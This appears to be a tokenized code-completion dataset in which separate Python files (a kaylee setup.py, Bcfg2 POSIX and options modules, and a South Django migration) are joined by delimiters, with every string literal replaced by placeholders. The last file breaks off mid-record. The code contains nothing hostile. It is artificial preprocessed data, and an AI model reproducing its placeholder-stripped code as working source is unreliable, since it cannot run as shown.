<s> import os <EOL> from setuptools import setup <EOL> import kaylee <EOL> def fullsplit ( path , result = None ) : <EOL> """<STR_LIT>""" <EOL> if result is None : <EOL> result = [ ] <EOL> head , tail = os . path . split ( path ) <EOL> if head == '<STR_LIT>' : <EOL> return [ tail ] + result <EOL> if head == path : <EOL> return result <EOL> return fullsplit ( head , [ tail ] + result ) <EOL> EXCLUDE_FROM_PACKAGES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def is_package ( package_name ) : <EOL> for pkg in EXCLUDE_FROM_PACKAGES : <EOL> if package_name . startswith ( pkg ) : <EOL> return False <EOL> return True <EOL> root_dir = os . path . dirname ( __file__ ) <EOL> if root_dir != '<STR_LIT>' : <EOL> os . chdir ( root_dir ) <EOL> kaylee_dir = '<STR_LIT>' <EOL> packages , package_data = [ ] , { } <EOL> for dirpath , dirnames , filenames in os . walk ( kaylee_dir ) : <EOL> dirnames [ : ] = [ d for d in dirnames if not d . startswith ( '<STR_LIT:.>' ) and d != '<STR_LIT>' ] <EOL> parts = fullsplit ( dirpath ) <EOL> package_name = '<STR_LIT:.>' . join ( parts ) <EOL> if '<STR_LIT>' in filenames and is_package ( package_name ) : <EOL> packages . append ( package_name ) <EOL> elif filenames : <EOL> relative_path = [ ] <EOL> while '<STR_LIT:.>' . join ( parts ) not in packages : <EOL> relative_path . append ( parts . pop ( ) ) <EOL> relative_path . reverse ( ) <EOL> path = os . path . join ( * relative_path ) <EOL> package_files = package_data . setdefault ( '<STR_LIT:.>' . join ( parts ) , [ ] ) <EOL> package_files . extend ( [ os . path . join ( path , f ) for f in filenames ] ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = kaylee . __version__ , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . 
read ( ) , <EOL> packages = packages , <EOL> package_data = package_data , <EOL> zip_safe = False , <EOL> scripts = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from Bcfg2 . Client . Tools . POSIX . base import POSIXTool <EOL> class POSIXNonexistent ( POSIXTool ) : <EOL> """<STR_LIT>""" <EOL> __req__ = [ '<STR_LIT:name>' ] <EOL> def verify ( self , entry , _ ) : <EOL> if os . path . lexists ( entry . get ( '<STR_LIT:name>' ) ) : <EOL> self . logger . debug ( "<STR_LIT>" % <EOL> entry . get ( "<STR_LIT:name>" ) ) <EOL> return False <EOL> return True <EOL> def install ( self , entry ) : <EOL> ename = entry . get ( '<STR_LIT:name>' ) <EOL> recursive = entry . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) == '<STR_LIT:true>' <EOL> if recursive : <EOL> for struct in self . config . getchildren ( ) : <EOL> for el in struct . getchildren ( ) : <EOL> if ( el . tag == '<STR_LIT>' and <EOL> el . get ( '<STR_LIT:type>' ) != '<STR_LIT>' and <EOL> el . get ( '<STR_LIT:name>' ) . startswith ( ename ) ) : <EOL> self . logger . error ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ename ) <EOL> return False <EOL> try : <EOL> self . _remove ( entry , recursive = recursive ) <EOL> return True <EOL> except OSError : <EOL> err = sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> self . logger . error ( '<STR_LIT>' % ( ename , err ) ) <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> import copy <EOL> import fnmatch <EOL> import os <EOL> import sys <EOL> from Bcfg2 . Options import Types <EOL> from Bcfg2 . Compat import ConfigParser <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> unit_test = False <EOL> def _debug ( msg ) : <EOL> """<STR_LIT>""" <EOL> if unit_test : <EOL> print ( "<STR_LIT>" % msg ) <EOL> elif os . environ . get ( '<STR_LIT>' , '<STR_LIT:0>' ) . lower ( ) in [ "<STR_LIT:true>" , "<STR_LIT:yes>" , <EOL> "<STR_LIT>" , "<STR_LIT:1>" ] : <EOL> sys . stderr . write ( "<STR_LIT>" % msg ) <EOL> _action_map = dict ( ) <EOL> def _get_action_class ( action_name ) : <EOL> """<STR_LIT>""" <EOL> if ( isinstance ( action_name , type ) and <EOL> issubclass ( action_name , argparse . Action ) ) : <EOL> return action_name <EOL> if action_name not in _action_map : <EOL> action = argparse . ArgumentParser ( ) . add_argument ( action_name , <EOL> action = action_name ) <EOL> _action_map [ action_name ] = action . __class__ <EOL> return _action_map [ action_name ] <EOL> class Option ( object ) : <EOL> """<STR_LIT>""" <EOL> _local_args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . args = args <EOL> self . _kwargs = kwargs <EOL> self . cf = None <EOL> self . env = None <EOL> self . man = None <EOL> self . parsers = [ ] <EOL> self . actions = dict ( ) <EOL> self . type = self . _kwargs . get ( "<STR_LIT:type>" ) <EOL> self . help = self . _kwargs . get ( "<STR_LIT>" ) <EOL> self . _default = self . _kwargs . get ( "<STR_LIT:default>" ) <EOL> for kwarg in self . _local_args : <EOL> setattr ( self , kwarg , self . _kwargs . pop ( kwarg , None ) ) <EOL> if self . args : <EOL> self . _dest = None <EOL> else : <EOL> action_cls = _get_action_class ( self . _kwargs . get ( '<STR_LIT:action>' , '<STR_LIT:store>' ) ) <EOL> self . 
_dest = None <EOL> if '<STR_LIT>' in self . _kwargs : <EOL> self . _dest = self . _kwargs . pop ( '<STR_LIT>' ) <EOL> elif self . env is not None : <EOL> self . _dest = self . env <EOL> elif self . cf is not None : <EOL> self . _dest = self . cf [ <NUM_LIT:1> ] <EOL> self . _dest = self . _dest . lower ( ) . replace ( "<STR_LIT:->" , "<STR_LIT:_>" ) <EOL> kwargs = copy . copy ( self . _kwargs ) <EOL> kwargs . pop ( "<STR_LIT:action>" , None ) <EOL> self . actions [ None ] = action_cls ( self . _dest , self . _dest , ** kwargs ) <EOL> def __repr__ ( self ) : <EOL> sources = [ ] <EOL> if self . args : <EOL> sources . extend ( self . args ) <EOL> if self . cf : <EOL> sources . append ( "<STR_LIT>" % self . cf ) <EOL> if self . env : <EOL> sources . append ( "<STR_LIT:$>" + self . env ) <EOL> spec = [ "<STR_LIT>" % sources , "<STR_LIT>" % self . default , <EOL> "<STR_LIT>" % len ( self . parsers ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , <EOL> self . dest , "<STR_LIT:U+002CU+0020>" . join ( spec ) ) <EOL> def list_options ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ self ] <EOL> def finalize ( self , namespace ) : <EOL> """<STR_LIT>""" <EOL> for parser , action in self . actions . items ( ) : <EOL> if hasattr ( action , "<STR_LIT>" ) : <EOL> if parser : <EOL> _debug ( "<STR_LIT>" % ( self , parser ) ) <EOL> else : <EOL> _debug ( "<STR_LIT>" % self ) <EOL> action . finalize ( parser , namespace ) <EOL> @ property <EOL> def _type_func ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . type : <EOL> return self . type <EOL> else : <EOL> return lambda x : x <EOL> def from_config ( self , cfp ) : <EOL> """<STR_LIT>""" <EOL> if not self . cf : <EOL> return None <EOL> if '<STR_LIT:*>' in self . cf [ <NUM_LIT:1> ] : <EOL> if cfp . has_section ( self . cf [ <NUM_LIT:0> ] ) : <EOL> exclude = set ( ) <EOL> for parser in self . parsers : <EOL> exclude . update ( o . cf [ <NUM_LIT:1> ] <EOL> for o in parser . option_list <EOL> if o . cf and o . 
cf [ <NUM_LIT:0> ] == self . cf [ <NUM_LIT:0> ] ) <EOL> rv = dict ( [ ( o , cfp . get ( self . cf [ <NUM_LIT:0> ] , o ) ) <EOL> for o in fnmatch . filter ( cfp . options ( self . cf [ <NUM_LIT:0> ] ) , <EOL> self . cf [ <NUM_LIT:1> ] ) <EOL> if o not in exclude ] ) <EOL> else : <EOL> rv = { } <EOL> else : <EOL> try : <EOL> rv = self . _type_func ( self . get_config_value ( cfp ) ) <EOL> except ( ConfigParser . NoSectionError , ConfigParser . NoOptionError ) : <EOL> rv = None <EOL> _debug ( "<STR_LIT>" % ( self , rv ) ) <EOL> return rv <EOL> def get_config_value ( self , cfp ) : <EOL> """<STR_LIT>""" <EOL> return cfp . get ( * self . cf ) <EOL> def get_environ_value ( self , value ) : <EOL> """<STR_LIT>""" <EOL> return value <EOL> def default_from_config ( self , cfp ) : <EOL> """<STR_LIT>""" <EOL> if self . env and self . env in os . environ : <EOL> self . default = self . _type_func ( <EOL> self . get_environ_value ( os . environ [ self . env ] ) ) <EOL> _debug ( "<STR_LIT>" % <EOL> ( self , self . default ) ) <EOL> else : <EOL> val = self . from_config ( cfp ) <EOL> if val is not None : <EOL> _debug ( "<STR_LIT>" % <EOL> ( self , val ) ) <EOL> self . default = val <EOL> def _get_default ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _default <EOL> def _set_default ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . _default = value <EOL> for action in self . actions . values ( ) : <EOL> action . default = value <EOL> default = property ( _get_default , _set_default ) <EOL> def _get_dest ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _dest <EOL> def _set_dest ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . _dest = value <EOL> for action in self . actions . values ( ) : <EOL> action . dest = value <EOL> def early_parsing_hook ( self , early_opts ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> dest = property ( _get_dest , _set_dest ) <EOL> def add_to_parser ( self , parser ) : <EOL> """<STR_LIT>""" <EOL> self . parsers . 
append ( parser ) <EOL> if self . args : <EOL> _debug ( "<STR_LIT>" % ( self , parser ) ) <EOL> action = parser . add_argument ( * self . args , ** self . _kwargs ) <EOL> if not self . _dest : <EOL> self . _dest = action . dest <EOL> if self . _default : <EOL> action . default = self . _default <EOL> self . actions [ parser ] = action <EOL> else : <EOL> _debug ( "<STR_LIT>" % <EOL> ( self , parser ) ) <EOL> class RepositoryMacroOption ( Option ) : <EOL> """<STR_LIT>""" <EOL> repository = None <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . _original_type = kwargs . pop ( '<STR_LIT:type>' , lambda x : x ) <EOL> kwargs [ '<STR_LIT:type>' ] = self . _type <EOL> kwargs . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Option . __init__ ( self , * args , ** kwargs ) <EOL> def early_parsing_hook ( self , early_opts ) : <EOL> if hasattr ( early_opts , "<STR_LIT>" ) : <EOL> if self . __class__ . repository is None : <EOL> _debug ( "<STR_LIT>" % <EOL> ( early_opts . repository , self . __class__ . __name__ ) ) <EOL> self . __class__ . repository = early_opts . repository <EOL> else : <EOL> _debug ( "<STR_LIT>" % self . __class__ ) <EOL> def _get_default ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self . _default , "<STR_LIT:replace>" ) : <EOL> return self . _default <EOL> else : <EOL> return self . _type ( self . _default ) <EOL> default = property ( _get_default , Option . _set_default ) <EOL> def transform_value ( self , value ) : <EOL> """<STR_LIT>""" <EOL> return value <EOL> def _type ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if self . __class__ . repository is None : <EOL> return value <EOL> else : <EOL> return self . _original_type ( self . transform_value ( <EOL> value . replace ( "<STR_LIT>" , self . __class__ . repository ) ) ) <EOL> class PathOption ( RepositoryMacroOption ) : <EOL> """<STR_LIT>""" <EOL> def transform_value ( self , value ) : <EOL> return Types . path ( value ) <EOL> class _BooleanOptionAction ( argparse . 
Action ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> argparse . Action . __init__ ( self , * args , ** kwargs ) <EOL> self . original = self . default <EOL> def __call__ ( self , parser , namespace , values , option_string = None ) : <EOL> if values is None : <EOL> setattr ( namespace , self . dest , self . default ) <EOL> elif option_string is not None : <EOL> setattr ( namespace , self . dest , not self . original ) <EOL> else : <EOL> setattr ( namespace , self . dest , bool ( values ) ) <EOL> class BooleanOption ( Option ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT:action>' , _BooleanOptionAction ) <EOL> kwargs . setdefault ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> kwargs . setdefault ( '<STR_LIT:default>' , False ) <EOL> Option . __init__ ( self , * args , ** kwargs ) <EOL> def get_environ_value ( self , value ) : <EOL> if value . lower ( ) in [ "<STR_LIT:false>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:0>" ] : <EOL> return False <EOL> elif value . lower ( ) in [ "<STR_LIT:true>" , "<STR_LIT:yes>" , "<STR_LIT>" , "<STR_LIT:1>" ] : <EOL> return True <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % value ) <EOL> def get_config_value ( self , cfp ) : <EOL> """<STR_LIT>""" <EOL> return cfp . getboolean ( * self . cf ) <EOL> class PositionalArgument ( Option ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = '<STR_LIT>' % args [ <NUM_LIT:0> ] <EOL> Option . __init__ ( self , * args , ** kwargs ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . alter_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True , to = orm [ '<STR_LIT>' ] ) ) <EOL> def backwards ( self , orm ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : 
( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : 
( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , 
<EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> 
'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' 